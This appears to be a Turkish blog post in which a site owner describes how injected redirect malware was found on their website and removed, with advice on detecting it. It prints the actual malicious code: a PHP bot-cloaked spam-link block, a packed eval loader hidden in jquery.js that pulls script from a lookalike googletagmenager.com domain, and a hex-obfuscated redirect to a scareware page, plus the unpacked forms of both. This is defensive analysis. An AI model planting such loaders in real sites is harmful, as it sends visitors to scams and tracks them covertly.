Web Sitem Başka Sayfaya Yönleniyor Virüs – Hack

Yayınlandığı Tarih:

Son Güncelleme: 11-03-2018

Web Sitem başka sayfaya yönleniyor diyor ve bunun nasıl olduğuna dair hiç bir bilginiz yok veya bunu nasıl düzelteceğinizi bilmiyorsanız bu yazım size yardımcı olabilir. 2017 Haziran ayından bu yana başıma bela olan siteme Hack ile eklenen yönlendirme kodlarından bahsetmek istiyorum. Öncelikle bu yazımı bir seri olarak ayarladığım için şu linkten sitenizdeki açıklar hakkında bilgi sahibi olmak için şu yazımı okuyabilirsiniz.

Web Sitem Başka Sayfaya Yönleniyor ise Yönlendirme kodlarını tespit edin:

1-) Header Footer Sidebar veya Single PHP dosyalarınıza ekledikleri yönlendirme kodları eklenmiş olabilir.
Örnek olarak şunu kontrol edebilirsiniz:

<?php
if(preg_match(‘/Google Web Preview|bot|Googlebot|google|AhrefsBot|spider|wget/i’,
$_SERVER[‘HTTP_USER_AGENT’])){ echo’ <marquee style=”position: absolute; width: 0px;”>
<a href=”http://www.xxx.com/” target=”_blank” rel=”dofollow”>Spam Site</a>,
<a href=”http://www.xxx.com/” target=”_blank” rel=”dofollow”>Spam Site</a>,
</marquee> ‘;   } ?>

2-) .htacces dosyanızda 301 veya başka şekilde yönlendirme olup olmadığını kontrol ediniz.

3-) Tema dosyanızda bulunan js-JavaScript dosyalarına eklenen başka sayfalardan JavaScript kodlarını sitenizde çalışmasını sağlayan çağırma kodları Eval metodu ile packed haline sokulmuş veya eval metodu yerine farklı karakter kodlaması ile gömülmüş kodlar bulunabilir. Bu kodlar ile hiçte aklınıza gelmeyecek şekilde kod çekecekleri sayfaları temanıza gömerek sürekli olarak sitenizi hem takip hemde istedikleri zaman başka sayfalara yönlendirme kodlarını kod çekilen sayfanın içeriğindeki kodu değiştirerek gerçekleştirebilirler.

Tecrübe ettiğim Hack olayından bahsetmem gerekirse;
Siteye kendim kullanıcı gibi giriş yaptığımda karşılaştığım yönlendirme ile kullanıcıların 1virusyakalandi.xyz/android.php diye bir sayfaya yönlendirildiğini fark ettim. Ancak bunu link sitemdeki dosyalarda aramama rağmen bulamıyordum.
Daha sonra 1virusyakalandi.xyz/android.php adresinden önce takip.site/general_android_turkcell.php diye bir sayfaya ardından da 1virusyakalandi.xyz adresine yönlendirdiğini ve Android Cihazınıza Virüs Bulaştı gibi ifadeler Tehlike Cihazınız Tehlikede gibi ifadelerin bulunduğu sayfa çıktığını fark ettim.

Ancak bu yönlendirme sürekli değil ve girdiğim telefondan 1 defa gözükmesinden sonra tekrarında gözükmüyordu en azından 3 5 saat içinde tekrarlamıyordu. Yani tespit etmekte kolay olmayacaktı. Sadece Mobil cihazlarda çalışması da ayrı bir soru işaretiydi.
Tüm olasılıkları kontrol etmemize rağmen hala sebep olan şeyi tespit edememiş eklentileri kaldırmış ancak başka bir telefondan denediğimde yine ortaya çıkıyordu.

Yönlendirme Kodu Nerede

En sonunda tema klasörümün içerisinde bir arkadaş bir kod bloğu tespit etti. Normalde jquery.js dosyasında normal olmayan bir satır ekliydi. İçerisinden çıkan kod bloğu şu şekilde idi:

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘(6(){7 0=1.5(\’0\’);0.2=\’3/4\’;0.8=\’//g.9/f.d\’;1.c.a(0)}).b(e)’,17,17,’script|document|type|text|javascript|createElement|function|var|src|com|appendChild|call|head|js|this|gtm|googletagmenager’.split(‘|’),0,{}))

Çıkan Kodu JavaScript unpacked sitesinden kontrol ettiğimde googletagmenager.com/gtm.js bir siteden kod çağrıldığını ve sitemde çalıştığını fark ettik.

(function()
{
var script=document.createElement(‘script’);
script.type=’text/javascript’;
script.src=’//googletagmenager.com/gtm.js’;
document.head.appendChild(script)
}
).call(this)

Bu sitedeki kod neydi onuda koyalım:

Bu kod ile siteme giren kullanıcılar Sites etkinliği ile Google Analytics üzerinden süreli olarak takip edilmekteydiler. Tabii verileri bilmediğim bir Google Kullanıcısına (UA-102173966-1) aktarılıyordu. Tabi bu kullanıcıyı şikayet ettim hemen. Ancak bu sitemin kullanıcılarını yönlendirme için yeterli olan kod değildi. Tabii o Google kullanıcısı gtm.js kod dosyasındaki Google Anlaytics kodu yerine istediği zaman istediği kodu değiştirerek yönlendirme kodunu koyarmuyorsa. Tabi Hack yapan kişi veya kişiler sistemden kaldırdığım kod bloğunu fark etmemiş olmalılar ki Google kodu yerine farklı bir x76/ /x87 gibi karakterler içeren bir kod bloğunu googletagmenager.com/gtm.js adresine yükleyince durum iyice netleşti koyduğu kod şu şekilde iken unpacked sitesinden kodu düzelttiğimizde takip.site adresi ortaya çıktı.

var _0xf3e8=[“\x63\x61\x6C\x6C”,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x74\x61\x6B\x69\x70\x2E\x73\x69\x74\x65\x2F\x67\x65\x6E\x65\x72\x61\x6C\x5F\x61\x6E\x64\x72\x6F\x69\x64\x2E\x70\x68\x70″];(function(){window[_0xf3e8[1]]= _0xf3e8[2]})[_0xf3e8[0]](this)

Unpack Yapılmış Hali:

(function() {
window[‘location’] = ‘http://www.takip.site/general_android.php’
})[‘call’](this)

Sonuç: Vatandaş siteme eklemiş olduğu kod ile tekrardan sitemin FTP dizinine girmeye uğraşmadan kendi sitesinden bu kodu değiştirerek kendi reklam sitelerine izlediği site ziyaretimin yoğunlaştığı anlarda başka sitelere yönlendirerek ya tıklamalardan para veyahut yönlendirdiği sitedeki virüs uyarısı ile temizlemek için bizi arayın butonuna tıklatarak istediği telefon numarasını kullanıcılara arattırarak aramadan ücret kazanma veya türlü türlü yöntemlere başvuruyormuşta olabilir.

Çıkan Telefon Numarası:

08882992626 numaralı telefonu aramadım ancak arayınca da çıkacak şeyleri az çok tahmin edebiliyorum. Ayrıca numara ücretli bir serviste olabilir.

Bu gibi şeyleri sayfanızın kaynak kodlarında belki yakalama ihtimali için Telefonunuzun view-source:https://www.afolog.com gibi telefonunuzda bulunan Google Chrome Tarayıcı ile Sayfa kaynak kodunuzda çıkan farklı site adresleri veya kodları görerek tespit etmeyi deneyebilirsiniz.

Ayrıca Total Comander veya Dreamviewer ile sitenizin tüm dosyalarını Masaüstüne indirerek yukarıdaki kod dökümlerine benzer kodları içeren dosyaları arama yöntemine başvurabilirsiniz. Şu yazımdan bu konu ile ilgili detaylı bilgiye ulaşabilirsiniz.

Yazıların İçine Gömülmüş Reklam veya Yönlendirme Kodları:

Ayrıca sitenizin yazıları içerisine gömülmüş linkler ile siteniz spam adreslere boğulmuş ise şu yazımdan bu linkler nasıl tespit edebileceğiniz ve temizleyeceğiniz hakkında da detaylıca bilgi sahibi olabilirsiniz.

Ayrıca Şu siteden WordPress Açıkları hakkında bilgi sahibi olun.

Sitemizde Yayımlanan İçeriklerin Artması, Daha Çok Sorun Çözümü ve İpucu Görmek İçin Katkıda Bulunabilirsiniz...
1Afo39vmUHdMPNfkxhCKaJW31ykdshxLSm

BTC: 1Afo39vmUHdMPNfkxhCKaJW31ykdshxLSm

“Web Sitem Başka Sayfaya Yönleniyor Virüs – Hack” için bir yorum

Bir Yorum Yazın